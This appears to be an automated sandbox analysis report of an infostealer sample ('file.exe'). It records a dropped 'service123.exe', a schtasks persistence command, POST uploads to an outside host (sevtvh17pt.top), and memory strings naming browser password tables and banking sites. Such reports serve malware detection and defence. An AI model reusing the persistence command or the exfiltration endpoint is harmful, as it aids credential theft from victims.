Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_007915B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
5_2_007915B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9D14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
5_2_6C9D14B0 |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
5_2_007981E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4AEC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4AF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4AF70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C9F0860 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C9FA9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C9FA9E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C9FA970 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CAAF990h |
5_2_6C9EEB10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
5_2_6CA784A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C9F4453 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C9FA580 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C9FA5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
5_2_6C9FA5F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C9FC510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6C9FE6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C9FE6E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
5_2_6CA70730 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C9F0740 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4C040 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4C1A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
5_2_6CA2A1E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
5_2_6C9F0260 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6CAAD014h] |
5_2_6CAA4360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4BD10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
5_2_6CA47D10 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
5_2_6CA43840 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
5_2_6C9FD974 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6CA0BBD7 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6CA0BBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6CA29B60 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6CA4B4D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
5_2_6C9FD504 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CAADFF4h |
5_2_6CA43690 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
5_2_6CA49600 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
5_2_6C9FD674 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
5_2_6C9FD7F4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C9EB1D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
5_2_6CA73140 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
5_2_6C9FD2A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
5_2_6CA67350 |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary46956507User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 413Host: sevtvh17pt.top |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary25984815User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 76061Host: sevtvh17pt.top |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary86278020User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 30040Host: sevtvh17pt.top |
Source: file.exe, 00000000.00000003.1417427067.000000000171B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://sevtvh17pt.top/v1/upload.php |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ac.ecosia.org/autocomplete?q= |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/ac/?q= |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/chrome_newtab |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= |
Source: LYgbAXPoWKdcsgBzdWtH.dll.0.dr |
String found in binary or memory: https://gcc.gnu.org/bugs/): |
Source: file.exe |
String found in binary or memory: https://serviceupdate32.com/update |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.ecosia.org/newtab/ |
Source: file.exe, 00000000.00000003.1457946077.000000000399A000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, |
5_2_6C9E9C22 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, |
5_2_6C9E9C22 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, |
5_2_6C9E9D11 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_007951B0 |
5_2_007951B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_00793E20 |
5_2_00793E20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA12CCE |
5_2_6CA12CCE |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9DCD00 |
5_2_6C9DCD00 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9DEE50 |
5_2_6C9DEE50 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E0FC0 |
5_2_6C9E0FC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA20AC0 |
5_2_6CA20AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E44F0 |
5_2_6C9E44F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA146E0 |
5_2_6CA146E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA087C0 |
5_2_6CA087C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA107D0 |
5_2_6CA107D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA12090 |
5_2_6CA12090 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA20060 |
5_2_6CA20060 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA02360 |
5_2_6CA02360 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA2DC70 |
5_2_6CA2DC70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E5880 |
5_2_6C9E5880 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA098F0 |
5_2_6CA098F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA17A20 |
5_2_6CA17A20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1DBEE |
5_2_6CA1DBEE |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1140E |
5_2_6CA1140E |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA21510 |
5_2_6CA21510 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1F610 |
5_2_6CA1F610 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9FF760 |
5_2_6C9FF760 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9E70C0 |
5_2_6C9E70C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA950D0 |
5_2_6CA950D0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9D3000 |
5_2_6C9D3000 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CAA36E0 appears 45 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CAA3B20 appears 38 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CA9ADB0 appears 49 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CAA5980 appears 83 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CAA3560 appears 42 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CAA3820 appears 31 times |
|
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: String function: 6CAA5A70 appears 77 times |
|
Source: file.exe, 00000000.00000003.1458179523.0000000003988000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key)); |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe" |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: winhttp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: webio.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: mswsock.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: iphlpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: winnsi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: dnsapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: rasadhlp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: fwpuclnt.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: uxtheme.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windowscodecs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: dpapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: ondemandconnroutehelper.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windows.storage.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wldp.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: propsys.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: dlnashext.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wpdshext.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: profapi.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: edputil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: urlmon.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: iertutil.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: srvcli.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: netutils.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: windows.staterepositoryps.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: wintypes.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: appresolver.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: bcp47langs.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: slc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: userenv.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: sppc.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: onecorecommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: onecoreuapcommonproxystub.dll |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Section loaded: msasn1.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: apphelp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: lygbaxpowkdcsgbzdwth.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: kernel.appcore.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: taskschd.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: sspicli.dll |
Jump to behavior |
Source: C:\Windows\SysWOW64\schtasks.exe |
Section loaded: xmllite.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: lygbaxpowkdcsgbzdwth.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptsp.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: rsaenh.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: cryptbase.dll |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Section loaded: lygbaxpowkdcsgbzdwth.dll |
Jump to behavior |
Source: file.exe |
Static PE information: section name: .eh_fram |
Source: service123.exe.0.dr |
Static PE information: section name: .eh_fram |
Source: LYgbAXPoWKdcsgBzdWtH.dll.0.dr |
Static PE information: section name: .eh_fram |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_0079A521 push es; iretd |
5_2_0079A694 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA80C30 push eax; mov dword ptr [esp], edi |
5_2_6CA80DAA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA4ED10 push eax; mov dword ptr [esp], ebx |
5_2_6CA4EE33 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA24E31 push eax; mov dword ptr [esp], ebx |
5_2_6CA24E45 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA18E7A push edx; mov dword ptr [esp], ebx |
5_2_6CA18E8E |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1A947 push eax; mov dword ptr [esp], ebx |
5_2_6CA1A95B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA20AA2 push eax; mov dword ptr [esp], ebx |
5_2_6CA20AB6 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA38AA0 push eax; mov dword ptr [esp], ebx |
5_2_6CA3909F |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA22AAC push edx; mov dword ptr [esp], ebx |
5_2_6CA22AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA4EAB0 push eax; mov dword ptr [esp], ebx |
5_2_6CA4EBDB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA52BF0 push eax; mov dword ptr [esp], ebx |
5_2_6CA52F24 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA52BF0 push edx; mov dword ptr [esp], ebx |
5_2_6CA52F43 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1048B push eax; mov dword ptr [esp], ebx |
5_2_6CA104A1 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA104E0 push eax; mov dword ptr [esp], ebx |
5_2_6CA106DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA18435 push edx; mov dword ptr [esp], ebx |
5_2_6CA18449 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA38460 push eax; mov dword ptr [esp], ebx |
5_2_6CA38A5F |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1A5A7 push eax; mov dword ptr [esp], ebx |
5_2_6CA1A5BB |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9F1CFA push eax; mov dword ptr [esp], ebx |
5_2_6CAA6622 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9F1CFA push eax; mov dword ptr [esp], ebx |
5_2_6CAA6622 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA106A2 push eax; mov dword ptr [esp], ebx |
5_2_6CA106DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA286A1 push 890005EAh; ret |
5_2_6CA286A9 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA106A6 push eax; mov dword ptr [esp], ebx |
5_2_6CA106DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA606B0 push eax; mov dword ptr [esp], ebx |
5_2_6CA60A4F |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA166F3 push edx; mov dword ptr [esp], ebx |
5_2_6CA16707 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA106FD push eax; mov dword ptr [esp], ebx |
5_2_6CA106DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA52620 push eax; mov dword ptr [esp], ebx |
5_2_6CA52954 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA52620 push edx; mov dword ptr [esp], ebx |
5_2_6CA52973 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1070E push eax; mov dword ptr [esp], ebx |
5_2_6CA106DA |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6CA1A777 push eax; mov dword ptr [esp], ebx |
5_2_6CA1A78B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9EE0D0 push eax; mov dword ptr [esp], ebx |
5_2_6CAA6AF6 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 5_2_6C9EE0D0 push edx; mov dword ptr [esp], edi |
5_2_6CAA6B36 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Last function: Thread delayed |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Last function: Thread delayed |
Source: C:\Windows\System32\conhost.exe |
Last function: Thread delayed |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: tasks.office.comVMware20,11696501413o |
Source: file.exe |
Binary or memory string: VMware |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: netportal.hdfcbank.comVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~ |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: dev.azure.comVMware20,11696501413j |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Interactive userers - COM.HKVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1417427067.0000000001735000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915924666.00000000016DE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1915924666.0000000001735000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Hyper-V RAW |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413 |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: secure.bankofamerica.comVMware20,11696501413|UE |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: bankofamerica.comVMware20,11696501413x |
Source: file.exe, 00000000.00000003.1458393882.00000000039AD000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: Canara Transaction PasswordVMware20,11696501413} |
